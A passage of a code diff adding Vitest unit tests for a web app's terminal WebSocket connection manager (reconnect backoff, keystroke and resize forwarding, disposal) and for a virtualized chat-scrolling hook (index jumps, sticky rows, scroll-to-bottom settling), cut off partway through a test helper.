+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      const ws = WS_INSTANCES[0]
+      expect(getTerminalCwd(id)).toBeUndefined()
+
+      ws.simulateJson({ type: 'cwd', path: '/home/builder/kiro-crew' })
+      expect(getTerminalCwd(id)).toBe('/home/builder/kiro-crew')
+
+      ws.simulateJson({ type: 'cwd', path: null })
+      expect(getTerminalCwd(id)).toBe('/home/builder/kiro-crew')
+    })
+  })
+
+  describe('connection lifecycle', () => {
+    it('dials the session endpoint and requests binary frames', () => {
+      const id = session('dial')
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      expect(WS_INSTANCES).toHaveLength(1)
+      expect(WS_INSTANCES[0].url).toBe(`ws://localhost:6776/api/ws/terminal/${id}`)
+      expect(WS_INSTANCES[0].binaryType).toBe('arraybuffer')
+    })
+
+    it('passes an encoded spawn cwd as a query parameter', () => {
+      const id = session('dial-cwd')
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon(), '/home/me/my repo')
+      expect(WS_INSTANCES[0].url).toContain('?cwd=%2Fhome%2Fme%2Fmy%20repo')
+    })
+
+    it('is idempotent — a second mount reuses the first socket', () => {
+      const id = session('idempotent')
+      const first = new FakeTerm()
+      const second = new FakeTerm()
+      ensureTerminalConnection(id, first.asTerminal(), new FakeFit().asFitAddon())
+      ensureTerminalConnection(id, second.asTerminal(), new FakeFit().asFitAddon())
+      expect(WS_INSTANCES).toHaveLength(1)
+      expect(second.dataCb).toBeUndefined()
+    })
+
+    it('resets the cached terminal and registers the socket on open', () => {
+      const id = session('open')
+      const term = new FakeTerm()
+      const fit = new FakeFit()
+      const waiter = vi.fn()
+      onTerminalReady(id, waiter)
+      ensureTerminalConnection(id, term.asTerminal(), fit.asFitAddon())
+      const ws = WS_INSTANCES[0]
+
+      ws.simulateOpen()
+      expect(term.reset).toHaveBeenCalledTimes(1)
+      expect(getTerminalWs(id)).toBe(ws as unknown as WebSocket)
+      expect(waiter).toHaveBeenCalledTimes(1)
+      // Hidden tab: fit() would measure 0x0, so no fit and no resize frame.
+      expect(fit.fit).not.toHaveBeenCalled()
+      expect(ws.send).not.toHaveBeenCalled()
+    })
+
+    it('fits and ships dimensions when the tab is laid out', () => {
+      const id = session('open-laid-out')
+      const term = new FakeTerm()
+      term.layOut()
+      term.cols = 120
+      term.rows = 40
+      const fit = new FakeFit()
+      ensureTerminalConnection(id, term.asTerminal(), fit.asFitAddon())
+      const ws = WS_INSTANCES[0]
+
+      ws.simulateOpen()
+      expect(fit.fit).toHaveBeenCalledTimes(1)
+      expect(JSON.parse(decode(ws))).toEqual({ type: 'resize', cols: 120, rows: 40 })
+    })
+
+    it('writes binary frames straight to the terminal', () => {
+      const id = session('binary')
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+      const bytes = new TextEncoder().encode('hello from the PTY')
+
+      WS_INSTANCES[0].simulateBinary(bytes)
+      expect(term.write).toHaveBeenCalledTimes(1)
+      expect(new TextDecoder().decode(term.write.mock.calls[0][0])).toBe('hello from the PTY')
+    })
+
+    it('swallows a control frame that is not JSON', () => {
+      const id = session('bad-json')
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+      expect(() => WS_INSTANCES[0].simulateText('not json at all')).not.toThrow()
+      expect(term.write).not.toHaveBeenCalled()
+    })
+
+    it('forwards keystrokes and resizes only while the socket is open', () => {
+      const id = session('io')
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+      const ws = WS_INSTANCES[0]
+
+      // Still CONNECTING: both listeners must drop the payload.
+      term.dataCb?.('early')
+      term.resizeCb?.({ cols: 10, rows: 5 })
+      expect(ws.send).not.toHaveBeenCalled()
+
+      ws.simulateOpen()
+      term.dataCb?.('ls -al')
+      term.resizeCb?.({ cols: 100, rows: 30 })
+      expect(decode(ws, 0)).toBe('ls -al')
+      expect(JSON.parse(decode(ws, 1))).toEqual({ type: 'resize', cols: 100, rows: 30 })
+    })
+
+    it('closes the socket from the error handler without reconnecting itself', () => {
+      const id = session('error')
+      vi.useFakeTimers()
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      const ws = WS_INSTANCES[0]
+
+      ws.simulateError()
+      expect(ws.close).toHaveBeenCalledTimes(1)
+      // The error path only closes; the reconnect belongs to onclose.
+      vi.advanceTimersByTime(60_000)
+      expect(WS_INSTANCES).toHaveLength(1)
+    })
+  })
+
+  describe('reconnect backoff', () => {
+    it('unregisters and redials with a doubling delay', () => {
+      const id = session('backoff')
+      vi.useFakeTimers()
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+
+      const ws1 = WS_INSTANCES[0]
+      ws1.simulateOpen()
+      expect(getTerminalWs(id)).not.toBeNull()
+
+      ws1.simulateClose()
+      expect(getTerminalWs(id)).toBeNull()
+      vi.advanceTimersByTime(999)
+      expect(WS_INSTANCES).toHaveLength(1)
+      vi.advanceTimersByTime(1)
+      expect(WS_INSTANCES).toHaveLength(2)
+
+      // Second drop without an intervening open: the delay doubles.
+      WS_INSTANCES[1].simulateClose()
+      vi.advanceTimersByTime(1999)
+      expect(WS_INSTANCES).toHaveLength(2)
+      vi.advanceTimersByTime(1)
+      expect(WS_INSTANCES).toHaveLength(3)
+    })
+
+    it('resets the delay after a successful reconnect', () => {
+      const id = session('backoff-reset')
+      vi.useFakeTimers()
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+
+      WS_INSTANCES[0].simulateClose()
+      vi.advanceTimersByTime(1000)
+      WS_INSTANCES[1].simulateOpen()   // retries back to 0
+      WS_INSTANCES[1].simulateClose()
+      vi.advanceTimersByTime(1000)
+      expect(WS_INSTANCES).toHaveLength(3)
+    })
+
+    it('stops redialling at the retry ceiling', () => {
+      const id = session('ceiling')
+      vi.useFakeTimers()
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+
+      // Ten drops with no successful open in between: the tenth schedules a
+      // redial that then refuses to dial, so the socket count stops at ten.
+      for (let attempt = 0; attempt < 11; attempt += 1) {
+        const latest = WS_INSTANCES[WS_INSTANCES.length - 1]
+        if (latest.readyState !== MockWebSocket.CLOSED) latest.simulateClose()
+        vi.advanceTimersByTime(60_000)
+      }
+      expect(WS_INSTANCES).toHaveLength(10)
+    })
+  })
+
+  describe('disposeTerminalConnection', () => {
+    it('tears down the socket, the timer and every per-session record', () => {
+      const id = session('dispose')
+      vi.useFakeTimers()
+      const term = new FakeTerm()
+      ensureTerminalConnection(id, term.asTerminal(), new FakeFit().asFitAddon())
+      const ws = WS_INSTANCES[0]
+      ws.simulateOpen()
+      ws.simulateJson({ type: 'title', text: 'vitest' })
+      ws.simulateJson({ type: 'cwd', path: '/srv/app' })
+
+      disposeTerminalConnection(id)
+      expect(ws.close).toHaveBeenCalledTimes(1)
+      expect(ws.onclose).toBeNull()
+      expect(getTerminalWs(id)).toBeNull()
+      expect(getTerminalCwd(id)).toBeUndefined()
+
+      const { result } = renderHook(() => useTerminalTitle(id))
+      expect(result.current).toBeUndefined()
+
+      // Nothing reconnects afterwards, and a second dispose is a no-op.
+      vi.advanceTimersByTime(60_000)
+      expect(WS_INSTANCES).toHaveLength(1)
+      expect(() => disposeTerminalConnection(id)).not.toThrow()
+      expect(ws.close).toHaveBeenCalledTimes(1)
+    })
+
+    it('cancels a pending reconnect timer', () => {
+      const id = session('dispose-pending')
+      vi.useFakeTimers()
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      WS_INSTANCES[0].simulateClose()
+
+      disposeTerminalConnection(id)
+      vi.advanceTimersByTime(60_000)
+      expect(WS_INSTANCES).toHaveLength(1)
+    })
+
+    it('drops waiters left behind by a tab closed before it ever connected', () => {
+      const id = session('dispose-waiters')
+      const waiter = vi.fn()
+      onTerminalReady(id, waiter)
+      ensureTerminalConnection(id, new FakeTerm().asTerminal(), new FakeFit().asFitAddon())
+      disposeTerminalConnection(id)
+
+      // A later session reusing the id must not inherit the stale waiter.
+      openSocket(id)
+      expect(waiter).not.toHaveBeenCalled()
+    })
+
+    it('is a no-op for a session that never had a connection', () => {
+      expect(() => disposeTerminalConnection(session('dispose-unknown'))).not.toThrow()
+    })
+  })
+})

--- a/website/src/test/UseVirtualChatCoverage.test.tsx
+++ b/website/src/test/UseVirtualChatCoverage.test.tsx
@@ -1,0 +1,893 @@
+// Feature: chat-virtualizer — useVirtualChat surface NOT covered by the
+// existing suites.
+//
+// The follow/pin wiring lives in useVirtualChat.integration.test.tsx and the
+// height-sync debounce in useVirtualChat.spacerLurch / .postStreamLurch. What
+// this file exercises is everything those leave cold:
+//   - the imperative jump APIs (scrollToIndex, scrollToIndexSmooth, mountIndex)
+//   - the isSticky full-scan path in virtualItems
+//   - the scrollToBottom settle frames (and their user-scroll bail-out)
+//   - the post-stream STREAMING_SETTLE_GRACE_MS timer expiring / being cancelled
+//   - ResizeObserver first-mount follow
+//   - the window.__vcSnapshot diagnostic probe
+//
+// happy-dom has no layout engine, so scroll geometry is faked on a controlled
+// scroller passed via `externalScrollerRef` (same harness as the sibling
+// suites), and getBoundingClientRect is stubbed where the code under test
+// reads it. `estimatedHeight` is pinned to ITEM_H so every row's offset is
+// exactly index * ITEM_H whether or not it has been measured — that makes the
+// jump-target arithmetic assertable rather than approximate.
+
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { renderHook, act } from '@testing-library/react'
+import { type RefObject } from 'react'
+import { useVirtualChat } from '../hooks/virtualizer/useVirtualChat'
+import type { UseVirtualChatOptions } from '../hooks/virtualizer/types'
+
+interface Geom { scrollTop: number; scrollHeight: number; clientHeight: number }
+interface Write { top: number; behavior?: string }
+
+/** A div with controllable scroll geometry, recording every scrollTo write. */
+function makeScroller(initial: Geom, opts: { withScrollTo?: boolean } = {}) {
+  const { withScrollTo = true } = opts
+  const el = document.createElement('div')
+  const state: Geom = { ...initial }
+  const writes: Write[] = []
+  Object.defineProperty(el, 'scrollTop', {
+    configurable: true,
+    get: () => state.scrollTop,
+    set: (v: number) => { state.scrollTop = v },
+  })
+  Object.defineProperty(el, 'scrollHeight', { configurable: true, get: () => state.scrollHeight })
+  Object.defineProperty(el, 'clientHeight', { configurable: true, get: () => state.clientHeight })
+  if (withScrollTo) {
+    ;(el as unknown as { scrollTo: (o: Write) => void }).scrollTo = (o) => {
+      writes.push({ ...o })
+      state.scrollTop = o.top
+    }
+  } else {
+    // The chokepoint falls back to a plain `scrollTop` assignment when the
+    // element exposes no scrollTo (older/partial DOM implementations).
+    ;(el as unknown as { scrollTo?: unknown }).scrollTo = undefined
+  }
+  return { el, state, writes }
+}
+
+/** Pin an element's rect so the header-offset derivation is deterministic. */
+function stubRectTop(node: HTMLElement, top: number) {
+  node.getBoundingClientRect = (() => ({
+    top, bottom: top, left: 0, right: 0, width: 0, height: 0, x: 0, y: top,
+    toJSON: () => ({}),
+  })) as HTMLElement['getBoundingClientRect']
+}
+
+interface Item { id: string }
+const getKey = (it: Item) => it.id
+const mkItems = (n: number): Item[] => Array.from({ length: n }, (_, i) => ({ id: `m${i}` }))
+
+/** Uniform row height — also the estimate, so offsets are exact everywhere. */
+const ITEM_H = 100
+
+function mkRow(height: number) {
+  const node = document.createElement('div')
+  Object.defineProperty(node, 'offsetHeight', { configurable: true, get: () => height })
+  return node
+}
+
+function mountHook(
+  sessionId: string,
+  items: Item[],
+  scroller: { el: HTMLDivElement } | null,
+  extra: Partial<UseVirtualChatOptions<Item>> = {},
+) {
+  const ref: RefObject<HTMLDivElement | null> | undefined =
+    scroller ? { current: scroller.el } : undefined
+  const initialProps: UseVirtualChatOptions<Item> = {
+    items,
+    sessionId,
+    getKey,
+    estimatedHeight: ITEM_H,
+    ...(ref ? { externalScrollerRef: ref } : {}),
+    ...extra,
+  }
+  const view = renderHook(
+    (props: UseVirtualChatOptions<Item>) => useVirtualChat<Item>(props),
+    { initialProps },
+  )
+  return { view, initialProps }
+}
+
+const mountedIndices = (items: { index: number }[]) => items.map((i) => i.index)
+
+// ---------------------------------------------------------------------------
+// scrollToIndex — window jump + aligned scrollTop, deferred into a frame.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: scrollToIndex', () => {
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  it('aligns the target row to the top of the viewport by default', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('sti-start', mkItems(21), sc)
+
+    act(() => { view.result.current.scrollToIndex(8) })
+
+    // Row 8 starts at 8 * ITEM_H; 'start' puts that offset at the viewport top.
+    expect(sc.el.scrollTop).toBe(800)
+  })
+
+  it('centres the target row for align:center', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('sti-center', mkItems(21), sc)
+
+    act(() => { view.result.current.scrollToIndex(8, { align: 'center' }) })
+
+    // 800 - clientHeight/2 + itemHeight/2
+    expect(sc.el.scrollTop).toBe(650)
+  })
+
+  it('aligns the target row to the bottom of the viewport for align:end', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('sti-end', mkItems(21), sc)
+
+    act(() => { view.result.current.scrollToIndex(8, { align: 'end' }) })
+
+    // 800 - clientHeight + itemHeight
+    expect(sc.el.scrollTop).toBe(500)
+  })
+
+  it('clamps the jump to the scrollable range and honours the requested behavior', () => {
+    // The last row's offset (2000) sits far beyond this scroller's maximum
+    // scrollTop (900 - 400), so the write must be clamped rather than passed
+    // through — an unclamped value would leave the scroller wedged.
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 900, clientHeight: 400 })
+    const { view } = mountHook('sti-clamp', mkItems(21), sc)
+    sc.writes.length = 0
+
+    act(() => { view.result.current.scrollToIndex(20, { behavior: 'smooth' }) })
+
+    expect(sc.el.scrollTop).toBe(500)
+    expect(sc.writes.at(-1)).toEqual({ top: 500, behavior: 'smooth' })
+  })
+
+  it('mounts the target row so a caller can scroll to an off-window index', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 30000, clientHeight: 400 })
+    const { view } = mountHook('sti-mount', mkItems(300), sc)
+    expect(mountedIndices(view.result.current.virtualItems)).not.toContain(50)
+
+    act(() => { view.result.current.scrollToIndex(50) })
+
+    expect(mountedIndices(view.result.current.virtualItems)).toContain(50)
+  })
+
+  it('releases follow so a later append does not yank the viewport back', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view, initialProps } = mountHook('sti-release', mkItems(21), sc)
+    // Slot entry pins to the bottom, so follow starts armed.
+    expect(sc.el.scrollTop).toBe(2600)
+
+    act(() => { view.result.current.scrollToIndex(5) })
+    expect(sc.el.scrollTop).toBe(500)
+
+    act(() => {
+      sc.state.scrollHeight = 3200
+      view.rerender({ ...initialProps, items: mkItems(22) })
+    })
+
+    expect(sc.el.scrollTop).toBe(500)
+  })
+
+  it('no-ops for an empty list and when no scroller is attached', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 0, clientHeight: 400 })
+    const empty = mountHook('sti-empty', [], sc)
+    sc.writes.length = 0
+    act(() => { empty.view.result.current.scrollToIndex(3) })
+    expect(sc.writes).toEqual([])
+
+    const detached = mountHook('sti-noscroller', mkItems(10), null)
+    expect(() => act(() => { detached.view.result.current.scrollToIndex(3) })).not.toThrow()
+  })
+
+  it('writes through plain scrollTop when the scroller exposes no scrollTo', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 }, { withScrollTo: false })
+    const { view } = mountHook('sti-no-scrollto', mkItems(21), sc)
+
+    // Slot entry already had to take the fallback path to reach the bottom.
+    expect(sc.el.scrollTop).toBe(2600)
+
+    act(() => { view.result.current.scrollToIndex(4) })
+    expect(sc.el.scrollTop).toBe(400)
+  })
+})
+
+// ---------------------------------------------------------------------------
+// scrollToIndexSmooth — no pre-mounted window; target derived from a mounted
+// row so the caller's header spacer is accounted for.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: scrollToIndexSmooth', () => {
+  const HEADER_PX = 40
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  /**
+   * Registers two measured rows whose rects imply DIFFERENT header offsets:
+   * the lower-index row (2) implies HEADER_PX, the higher-index row (5) — the
+   * one registered FIRST, so it comes first in Map insertion order — implies
+   * HEADER_PX + 50. The hook must pick the lowest index, not the first entry.
+   */
+  function setupRows(sc: ReturnType<typeof makeScroller>, view: ReturnType<typeof mountHook>['view']) {
+    stubRectTop(sc.el, 0)
+    const stale = mkRow(ITEM_H)
+    stubRectTop(stale, HEADER_PX + 50 + 5 * ITEM_H - sc.state.scrollTop)
+    const lowest = mkRow(ITEM_H)
+    stubRectTop(lowest, HEADER_PX + 2 * ITEM_H - sc.state.scrollTop)
+    act(() => { view.result.current.measureRef(5)(stale) })
+    act(() => { view.result.current.measureRef(2)(lowest) })
+  }
+
+  it('derives the header offset from the LOWEST-index mounted row', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('stis-header', mkItems(21), sc)
+    setupRows(sc, view)
+    sc.writes.length = 0
+
+    act(() => { view.result.current.scrollToIndexSmooth(10) })
+
+    // headerPx + row offset. Reading the first Map entry (index 5, whose rect
+    // is deliberately 50px off) would land at 1090 instead.
+    expect(sc.writes.at(-1)).toEqual({ top: HEADER_PX + 1000, behavior: 'smooth' })
+  })
+
+  it('centres the target and applies the caller offset', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('stis-center', mkItems(21), sc)
+    setupRows(sc, view)
+    sc.writes.length = 0
+
+    act(() => { view.result.current.scrollToIndexSmooth(10, { align: 'center', offset: -25 }) })
+
+    // (40 + 1000) - clientHeight/2 + itemHeight/2 + offset
+    expect(sc.el.scrollTop).toBe(865)
+  })
+
+  it('treats the header as zero when no row is mounted yet, and clamps to the range', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 900, clientHeight: 400 })
+    const { view } = mountHook('stis-clamp', mkItems(21), sc)
+    stubRectTop(sc.el, 0)
+    sc.writes.length = 0
+
+    act(() => { view.result.current.scrollToIndexSmooth(999) })
+
+    // Index clamped to the last row, target clamped to the scrollable maximum.
+    expect(sc.writes.at(-1)).toEqual({ top: 500, behavior: 'smooth' })
+  })
+
+  it('releases follow so streaming growth no longer pins the viewport', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view, initialProps } = mountHook('stis-release', mkItems(21), sc)
+    stubRectTop(sc.el, 0)
+
+    act(() => { view.result.current.scrollToIndexSmooth(3) })
+    const landed = sc.el.scrollTop
+
+    act(() => {
+      sc.state.scrollHeight = 3400
+      view.rerender({ ...initialProps, items: mkItems(23) })
+    })
+
+    expect(sc.el.scrollTop).toBe(landed)
+  })
+
+  it('no-ops for an empty list and when no scroller is attached', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 0, clientHeight: 400 })
+    const empty = mountHook('stis-empty', [], sc)
+    sc.writes.length = 0
+    act(() => { empty.view.result.current.scrollToIndexSmooth(0) })
+    expect(sc.writes).toEqual([])
+
+    const detached = mountHook('stis-noscroller', mkItems(10), null)
+    expect(() => act(() => { detached.view.result.current.scrollToIndexSmooth(3) })).not.toThrow()
+  })
+})
+
+// ---------------------------------------------------------------------------
+// mountIndex — near targets union with the window, far targets replace it and
+// report themselves so the caller can teleport instead of gliding.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: mountIndex', () => {
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  it('unions the window for a NEAR target and reports it as near', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 30000, clientHeight: 400 })
+    const { view } = mountHook('mi-near', mkItems(300), sc)
+    const before = mountedIndices(view.result.current.virtualItems)
+    expect(before).toContain(299)
+
+    let far: boolean | undefined
+    act(() => { far = view.result.current.mountIndex(280) })
+
+    const after = mountedIndices(view.result.current.virtualItems)
+    expect(far).toBe(false)
+    expect(after).toContain(280)
+    // Union, not replacement: the previous tail stays mounted (no flash).
+    expect(after).toContain(299)
+  })
+
+  it('replaces the window for a FAR target and reports it as far', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 30000, clientHeight: 400 })
+    const { view } = mountHook('mi-far', mkItems(300), sc)
+    expect(mountedIndices(view.result.current.virtualItems)).toContain(299)
+
+    let far: boolean | undefined
+    act(() => { far = view.result.current.mountIndex(0) })
+
+    const after = mountedIndices(view.result.current.virtualItems)
+    expect(far).toBe(true)
+    expect(after).toContain(0)
+    // Replacement: the thousands of rows in between are NOT mounted.
+    expect(after).not.toContain(299)
+    expect(after.length).toBeLessThan(20)
+  })
+
+  it('clamps an out-of-range index onto the last row', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('mi-clamp', mkItems(21), sc)
+
+    act(() => { view.result.current.mountIndex(9999) })
+
+    expect(mountedIndices(view.result.current.virtualItems)).toContain(20)
+  })
+
+  it('reports near (false) for an empty list', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 0, clientHeight: 400 })
+    const { view } = mountHook('mi-empty', [], sc)
+
+    let far: boolean | undefined
+    act(() => { far = view.result.current.mountIndex(4) })
+
+    expect(far).toBe(false)
+    expect(view.result.current.virtualItems).toEqual([])
+  })
+})
+
+// ---------------------------------------------------------------------------
+// isSticky — the full-scan path: a sticky row renders even off-window.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: sticky items', () => {
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  it('keeps a sticky row mounted while it sits far outside the window', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 30000, clientHeight: 400 })
+    const { view } = mountHook('sticky-off-window', mkItems(300), sc, {
+      isSticky: (_it, i) => i === 3,
+    })
+
+    const indices = mountedIndices(view.result.current.virtualItems)
+    expect(indices).toContain(3)
+    expect(indices).toContain(299)
+    // Non-sticky off-window rows are still omitted (the spacers cover them).
+    expect(indices).not.toContain(150)
+    // Emitted in index order so React reconciliation stays stable.
+    expect([...indices].sort((a, b) => a - b)).toEqual(indices)
+  })
+
+  it('marks every emitted row mounted and sizes it from the height cache', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view, initialProps } = mountHook('sticky-heights', mkItems(21), sc, {
+      isSticky: (_it, i) => i === 0,
+    })
+    // Measured off-window: the sticky row is mounted, so it gets a real height
+    // instead of the estimate the placeholder path would use.
+    act(() => { view.result.current.measureRef(0)(mkRow(137)) })
+    act(() => { view.rerender({ ...initialProps, items: mkItems(22), isSticky: (_it, i) => i === 0 }) })
+
+    const sticky = view.result.current.virtualItems.find((v) => v.index === 0)
+    expect(sticky?.mounted).toBe(true)
+    expect(sticky?.height).toBe(137)
+    expect(view.result.current.virtualItems.every((v) => v.mounted)).toBe(true)
+  })
+})
+
+// ---------------------------------------------------------------------------
+// scrollToBottom — pins next frame, then re-pins over a few settle frames so a
+// late measurement cannot leave the jump short of the true bottom.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: scrollToBottom settle', () => {
+  let origRaf: typeof globalThis.requestAnimationFrame
+  let frames: FrameRequestCallback[]
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    frames = []
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => {
+      frames.push(cb)
+      return frames.length
+    }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  const runFrame = () => {
+    const cb = frames.shift()
+    if (cb) act(() => { cb(0) })
+    return cb !== undefined
+  }
+
+  function mountAttached(sessionId: string) {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 2000, clientHeight: 400 })
+    // The settle frames guard on el.isConnected, so the scroller must be live.
+    document.body.appendChild(sc.el)
+    const mounted = mountHook(sessionId, mkItems(21), sc)
+    frames.length = 0
+    return { sc, ...mounted }
+  }
+
+  it('re-pins across settle frames so late growth still lands exactly at the bottom', () => {
+    const { sc, view } = mountAttached('stb-settle')
+    act(() => { view.result.current.scrollToBottom() })
+
+    // Frame 1 is the initial pin against the geometry known right now.
+    runFrame()
+    expect(sc.el.scrollTop).toBe(1600)
+
+    // Rows measured after the tail window committed keep moving the bottom
+    // down. Each settle frame re-targets it.
+    for (const h of [2400, 2600, 2800]) {
+      sc.state.scrollHeight = h
+      runFrame()
+      expect(sc.el.scrollTop).toBe(h - 400)
+    }
+
+    // Bounded: the settle stops after three frames rather than looping.
+    expect(frames.length).toBe(0)
+    sc.el.remove()
+  })
+
+  it('skips the settle frames for a smooth scroll so the glide is not cut short', () => {
+    const { sc, view } = mountAttached('stb-smooth')
+    act(() => { view.result.current.scrollToBottom('smooth') })
+    sc.writes.length = 0
+
+    runFrame()
+
+    expect(sc.writes).toEqual([{ top: 1600, behavior: 'smooth' }])
+    // No settle frame was queued — an instant re-pin would abort the glide.
+    expect(frames.length).toBe(0)
+    sc.el.remove()
+  })
+
+  it('abandons the settle when the user scrolls away mid-sequence', () => {
+    const { sc, view } = mountAttached('stb-settle-abort')
+    act(() => { view.result.current.scrollToBottom() })
+    runFrame()
+    expect(sc.el.scrollTop).toBe(1600)
+
+    // The user grabs the page before the settle frame runs; the scroll handler
+    // releases follow, so the pending frame must not yank them back.
+    act(() => { sc.state.scrollTop = 400; sc.el.dispatchEvent(new Event('scroll')) })
+    sc.state.scrollHeight = 2600
+    while (runFrame()) { /* drain every queued frame */ }
+
+    expect(sc.el.scrollTop).toBe(400)
+    sc.el.remove()
+  })
+
+  it('no-ops for an empty list', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 0, clientHeight: 400 })
+    const { view } = mountHook('stb-empty', [], sc)
+    frames.length = 0
+    sc.writes.length = 0
+
+    act(() => { view.result.current.scrollToBottom() })
+    while (runFrame()) { /* drain */ }
+
+    expect(sc.writes).toEqual([])
+  })
+})
+
+// ---------------------------------------------------------------------------
+// Post-stream settle grace — a row that keeps resizing as its turn closes stays
+// on the immediate height-sync path for a FIXED window, then reverts.
+// ---------------------------------------------------------------------------
+class FakeResizeObserver {
+  static instances: FakeResizeObserver[] = []
+  cb: ResizeObserverCallback
+  observed = new Set<Element>()
+  constructor(cb: ResizeObserverCallback) {
+    this.cb = cb
+    FakeResizeObserver.instances.push(this)
+  }
+  observe(el: Element) { this.observed.add(el) }
+  unobserve(el: Element) { this.observed.delete(el) }
+  disconnect() { this.observed.clear() }
+  fire(entries: Partial<ResizeObserverEntry>[]) {
+    this.cb(entries as ResizeObserverEntry[], this as unknown as ResizeObserver)
+  }
+}
+
+function resizeTo(target: HTMLElement, height: number): Partial<ResizeObserverEntry> {
+  Object.defineProperty(target, 'offsetHeight', { configurable: true, get: () => height })
+  return { target }
+}
+
+const latestRo = () => FakeResizeObserver.instances[FakeResizeObserver.instances.length - 1]
+
+describe('useVirtualChat: streaming settle grace lifecycle', () => {
+  let origRO: typeof ResizeObserver | undefined
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    FakeResizeObserver.instances = []
+    origRO = globalThis.ResizeObserver
+    globalThis.ResizeObserver = FakeResizeObserver as unknown as typeof ResizeObserver
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+    globalThis.ResizeObserver = origRO as typeof ResizeObserver
+    globalThis.requestAnimationFrame = origRaf
+  })
+
+  /** Mounts 21 rows with the tail row streaming, all heights settled. */
+  function mountStreaming(sessionId: string) {
+    const sc = makeScroller({ scrollTop: 500, scrollHeight: 3000, clientHeight: 400 })
+    const items = mkItems(21)
+    const lastIdx = items.length - 1
